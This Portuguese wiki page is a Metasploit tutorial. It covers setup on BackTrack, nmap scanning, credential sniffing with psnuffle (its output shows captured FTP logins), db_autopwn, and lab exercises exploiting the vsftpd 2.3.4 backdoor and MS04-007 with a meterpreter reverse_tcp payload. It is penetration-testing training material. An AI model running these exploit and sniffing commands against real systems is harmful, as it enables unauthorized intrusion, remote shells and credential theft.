Metasploit

De Peotta-Wiki
Ir para: navegação, pesquisa

Metasploit é um framework criado para permitir que análises de vulnerabilidades sejam feitas de maneira rápida e eficiente. Por se tratar de uma ferramenta de segurança é necessário que cuidados sejam tomados, a fim de que nenhuma aplicação testada deixe de funcionar corretamente.


Note Nota: Para testes é recomendado que se use distribuições especiais. [Metasploitable ] é uma ótima distro.


Conteúdo

Instalando mestasploit

No caso do [Backtrack] tudo já está instalado, bastando, em alguns casos, que seja atualizado para versões mais recentes.

Atualização de versão

# Atualização de versão do metasploit

root@bt:~# apt-get update
root@bt:~# apt-get install framework4

Atualização de base de exploits

# Atualização de base

root@bt:~# cd /pentest/exploits/framework2/ ou framework3 ou framework4
root@bt:~# ./msfupdate

Configurando conexão do banco de dados

Configurando e verificando conexão do banco de dados que irá armazenar os dados das análises.

Instalar PostgreSQL

root@bt:~# apt-get install postgresql
root@bt:~# apt-get install pgadmin3

Configurar PostgreSQL

$sudo –u postgres createuser --superuser $USER

$sudo –u postgres psql
postgres@bt:~# \password username
postgres@bt:~# createdb metasploit

Usando Metasploit

root@bt:~# /usr/local/bin/msfconsole

%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                                                                             

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15728 updated 77 days ago (2012.08.10)

Warning: This copy of the Metasploit Framework was last updated 77 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf >

Verifica PostgreSQL

root@bt:~# /usr/local/bin/msfconsole

# Verifica banco de dados. Como resposta: "postgresql connected to msf3".

msf > db_status
[*] postgresql connected to msf3dev
msf >

Rodando Nmap

Rodando Nmap e armazenando resposta.

msf > db_nmap -sS -sV -T 5 -P0 -O 172.16.40.43

Análise de protocolos inseguros

root@bt:~# /usr/local/bin/msfconsole

msf > use auxiliary/sniffer/psnuffle
msf  auxiliary(psnuffle) > show options

Module options (auxiliary/sniffer/psnuffle):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILTER                      no        The filter string for capturing traffic
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
   SNAPLEN    65535            yes       The number of bytes to capture
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(psnuffle) >

msf  auxiliary(psnuffle) > run
[*] Auxiliary module execution completed

[*] Loaded protocol FTP from /opt/metasploit/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/metasploit/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/metasploit/msf3/data/exploits/psnuffle/pop3.rb...
msf  auxiliary(psnuffle) > [*] Loaded protocol SMB from /opt/metasploit/msf3/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /opt/metasploit/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Failed FTP Login: 172.18.174.4:52497-172.18.174.40:21 >> usuario / 123456
[*] Successful FTP Login: 172.18.174.4:52532-172.18.174.40:21 >> root / toor

Verificando vulnerabilidades

msf >db_autopwn -p -e -t

Exercício 1: Explorando vulnerabilidade vsftp

Direcionando um teste específico – backdoor vsftp 2.3.4.

Instalar vsftpd-2.3.4.tar.gz.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > set RHOST localhost
msf > set PAYLOAD cmd/unix/interact
msf > exploit

Exercício 2: Explorando vulnerabilidade Windows XP SP1

Microsoft ASN.1 Library Bitstring Heap Overflow

This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads.

msf > use exploit/windows/smb/ms04_007_killbill
msf > exploit(ms04_007_killbill) > show payloads
msf > exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit(ms04_007_killbill) > set LHOST [MY IP ADDRESS]
msf > exploit(ms04_007_killbill) > set RHOST [TARGET IP]
msf exploit(ms04_007_killbill) > exploit
Ferramentas pessoais
Espaços nominais

Variantes
Ações
Navegação
Ferramentas